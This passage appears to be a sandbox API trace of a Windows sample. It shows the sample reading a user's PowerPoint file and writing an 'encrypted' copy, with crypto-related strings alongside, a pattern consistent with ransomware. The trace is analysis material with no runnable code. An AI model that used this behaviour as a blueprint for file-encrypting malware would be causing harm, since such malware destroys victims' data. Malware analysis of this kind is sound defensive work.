lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.301] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.301] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.301] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.301] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.301] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.301] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0033.301] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.301] CryptDestroyHash (hHash=0x7c2240) returned 1 [0033.301] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.301] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.301] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.301] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.301] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.302] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\kH1fN.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kh1fn.pptx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0033.302] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0033.302] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0033.302] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0033.302] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0033.302] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0033.302] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0033.302] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0033.302] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0033.302] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0033.302] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0033.302] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.302] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0033.302] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0033.302] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0033.302] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0033.302] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0033.302] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0033.302] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0033.302] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.302] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0033.302] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.302] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0033.302] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0033.302] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0033.302] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0033.302] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0033.303] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0033.303] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0033.303] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0033.303] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0033.303] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0033.303] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0033.303] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0033.303] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0033.303] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0033.303] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0033.303] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0033.303] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0033.303] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0033.303] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0033.303] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0033.303] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0033.303] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0033.303] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0033.303] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0033.303] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0033.303] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0033.303] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0033.303] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0033.303] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5c40 [0033.303] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0033.303] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3688 [0033.303] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0033.303] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3630 [0033.303] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5c40 | out: hHeap=0x770000) returned 1 [0033.303] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0033.303] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0033.303] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0033.303] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.303] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0033.304] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3688 | out: hHeap=0x770000) returned 1 [0033.304] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0033.304] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0033.304] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0033.304] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0033.304] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x60) returned 0x87a9d8 [0033.304] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents")) returned 0x11 [0033.304] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87a9d8 | out: hHeap=0x770000) returned 1 [0033.304] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0033.304] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3630 | out: hHeap=0x770000) returned 1 [0033.304] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0033.304] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0033.304] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0033.304] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0033.304] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x89ffb8 [0033.304] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0033.304] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0033.304] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\kH1fN.encrypted.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kh1fn.encrypted.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0033.305] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0033.305] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0033.305] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0033.305] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0033.305] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0033.305] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0033.305] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0033.305] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0033.305] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.305] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0033.305] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0033.305] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0033.305] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0033.305] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0033.305] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0033.305] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c21c0 [0033.305] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.305] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0033.305] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.305] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c21c0 [0033.305] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.305] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0033.305] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0033.305] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0033.305] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0033.305] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0033.305] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0033.305] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0033.305] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0033.306] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0033.306] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0033.306] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0033.306] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0033.306] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0033.306] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0033.306] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0033.306] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0033.306] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0033.306] ReadFile (in: hFile=0x140, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6ae9b8*=0x10000, lpOverlapped=0x0) returned 1 [0033.308] ReadFile (in: hFile=0x140, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6ae9b8*=0x8731, lpOverlapped=0x0) returned 1 [0033.309] ReadFile (in: hFile=0x140, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0033.309] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0033.309] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0033.309] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0033.309] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0033.309] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18731) returned 0x935008 [0033.311] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0033.311] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0033.311] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0033.311] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0033.311] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0033.311] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0033.311] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18731) returned 0x94d748 [0033.318] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x935008 | out: hHeap=0x770000) returned 1 [0033.318] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0033.318] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.318] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0033.318] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0033.318] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0033.318] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0033.318] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0033.318] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18731) returned 0x935008 [0033.318] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0033.318] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x935008 | out: hHeap=0x770000) returned 1 [0033.318] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0033.318] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0033.318] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0033.318] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0033.318] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.318] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0033.318] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0033.319] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0033.319] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0033.319] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0033.319] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0033.319] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0033.319] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.319] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0033.319] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0033.319] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0033.319] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0033.319] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.319] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0033.319] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0033.319] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da228 [0033.319] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0033.319] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0033.319] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0033.319] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2c8 [0033.319] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18731) returned 0x935008 [0033.319] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0033.319] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da258 [0033.319] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0033.319] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0033.319] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0033.319] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da408 [0033.319] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0033.319] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0033.319] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0033.319] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da288 [0033.319] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0033.319] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da368 [0033.319] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0033.319] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8897c0 [0033.319] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0033.320] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0033.320] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0033.320] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0033.320] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3c8 [0033.320] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18731) returned 0x8affc0 [0033.321] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0033.321] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0033.321] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0033.321] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0033.321] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0033.321] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0033.321] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0033.321] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0033.321] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0033.321] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0033.321] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0033.321] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0033.321] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0033.321] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0033.321] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0033.321] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.321] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0033.321] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0033.321] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0033.321] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0033.321] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0033.321] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.321] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0033.321] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0033.321] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0033.322] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0033.322] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0033.322] RtlAllocateHeap 